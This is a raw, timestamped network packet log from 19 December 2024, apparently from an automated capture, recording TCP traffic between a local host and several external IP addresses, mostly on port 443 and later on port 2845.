                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.827791929 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.827824116 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.827836990 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.835388899 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.835441113 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.835470915 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.835480928 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.835513115 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.835535049 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.842262983 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.842308998 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.842330933 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.842339993 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.842376947 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.842403889 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.849922895 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.849976063 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.849999905 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.850018024 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.850058079 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.850080967 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.857737064 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.857783079 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.857810020 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.857819080 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.857847929 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.857857943 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.865016937 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.865065098 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.865091085 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.865098953 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.865127087 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.865150928 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.872955084 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.872997046 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.873075008 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.873085976 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.873210907 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.879894018 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.879937887 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.879970074 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.879977942 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.879995108 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:46.880012989 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.019901991 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.019951105 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.019975901 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.019990921 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.020021915 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.020031929 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.027098894 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.027146101 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.027175903 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.027184963 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.027230024 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.034857988 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.034898996 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.034919977 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.034928083 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.034953117 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.034985065 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.042668104 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.042722940 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.042731047 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.042751074 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.042776108 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.042788982 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.049555063 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.049595118 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.049618959 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.049627066 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.049659014 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.049683094 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.057714939 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.057760000 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.057776928 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.057787895 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.057816029 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.057827950 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.064506054 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.064547062 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.064582109 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.064589977 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.064620972 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.064642906 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.072233915 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.072284937 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.072307110 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.072314978 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.072339058 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.072382927 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.213058949 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.213109970 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.213151932 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.213174105 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.213210106 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.213232994 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.219280958 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.219342947 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.219346046 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.219374895 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.219403028 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.219425917 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.227015972 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.227060080 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.227092028 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.227101088 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.227166891 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.234770060 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.234812021 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.234836102 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.234844923 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.234874964 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.234941959 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.242582083 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.242630959 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.242666960 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.242676020 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.242710114 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.242731094 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.249809980 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.249851942 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.249875069 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.249883890 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.249916077 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.249934912 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.256630898 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.256674051 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.256712914 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.256721973 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.256755114 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.256766081 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.264482021 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.264504910 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.264555931 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.264565945 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.264594078 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.264621973 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.410733938 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.410773039 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.410804033 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.410830021 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.410849094 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.410888910 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.416173935 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.416199923 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.416232109 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.416243076 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.416279078 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.416291952 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.421219110 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.421250105 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.421279907 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.421288967 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.421319962 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.421334028 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.427711964 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.427738905 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.427767992 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.427778006 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.427809000 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.427830935 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.434500933 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.434529066 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.434586048 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.434595108 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.434631109 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.434648037 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.442997932 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.443065882 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.443072081 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.443099022 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.443136930 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.443150043 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.449640036 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.449688911 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.449724913 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.449736118 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.449769020 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.449780941 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.457324028 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.457366943 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.457398891 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.457408905 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.457441092 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.457458019 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.457523108 CET44349855162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.457600117 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.495666027 CET49855443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.742192984 CET49874443192.168.2.63.124.142.205
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.742235899 CET443498743.124.142.205192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.742379904 CET49874443192.168.2.63.124.142.205
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.751207113 CET49874443192.168.2.63.124.142.205
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:47.751226902 CET443498743.124.142.205192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.829336882 CET44349821162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.829416990 CET44349821162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.829454899 CET49821443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.831967115 CET44349820162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.832036972 CET44349820162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:48.832088947 CET49820443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:49.121786118 CET44349823172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:49.121943951 CET44349823172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:49.122006893 CET49823443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:49.122498989 CET44349822172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:49.122565031 CET44349822172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:49.122606039 CET49822443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:49.130951881 CET443498743.124.142.205192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:49.131023884 CET49874443192.168.2.63.124.142.205
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:49.133126020 CET49874443192.168.2.63.124.142.205
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:49.133140087 CET443498743.124.142.205192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:49.133408070 CET443498743.124.142.205192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:49.135149002 CET49874443192.168.2.63.124.142.205
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:49.175333977 CET443498743.124.142.205192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:50.608290911 CET443498743.124.142.205192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:50.608398914 CET443498743.124.142.205192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:50.608704090 CET49874443192.168.2.63.124.142.205
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:50.619333029 CET49874443192.168.2.63.124.142.205
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.361624002 CET49823443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.361645937 CET44349823172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.361757994 CET49822443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.361777067 CET44349822172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.363600969 CET49820443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.363610029 CET49821443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.363612890 CET44349820162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:51.363636017 CET44349821162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.395342112 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.514911890 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.515001059 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.515216112 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.635843039 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.726686954 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.729322910 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.849011898 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.104629040 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.149480104 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.168313980 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.287894011 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.559925079 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.560039043 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.560060978 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.560100079 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.560201883 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.560224056 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.560266018 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.560281992 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.560311079 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.560311079 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.560389042 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.560405016 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.560466051 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.568514109 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.568639994 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.568677902 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.572885036 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.572978020 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.679657936 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.679739952 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.680227041 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.752346992 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.752409935 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.752595901 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.756186962 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:13.756313086 CET284549931104.161.43.18192.168.2.6
